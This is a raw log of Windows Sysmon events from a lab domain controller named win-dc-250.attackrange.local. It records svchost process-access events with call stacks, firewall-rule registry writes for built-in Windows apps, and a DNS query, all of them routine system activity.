13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.185{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|M=microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy| 22542200x800000000000000010613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.151{00000000-0000-0000-0000-000000000000}4660win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;<unknown process> 13241300x800000000000000010612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.185{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7D1F9FFD-684E-4238-88D9-65B6D67D4D00}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x800000000000000010611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.185{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CB36C9F7-9D93-4624-A37F-8BE319AC34B4}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x800000000000000010610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.170{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|M=microsoft.windows.apprep.chxapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.154{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{E7843651-01C2-43F0-879A-E492E501418C}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.154{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C6EDC9D7-62D3-4671-AA07-C60272D5AA71}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.154{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4565F422-A0FE-4834-9ECC-D1F3F8220E0E}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:59.154{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5B9E59F5-9A2E-4B32-957D-AF8803D62118}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 10341000x800000000000000010605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 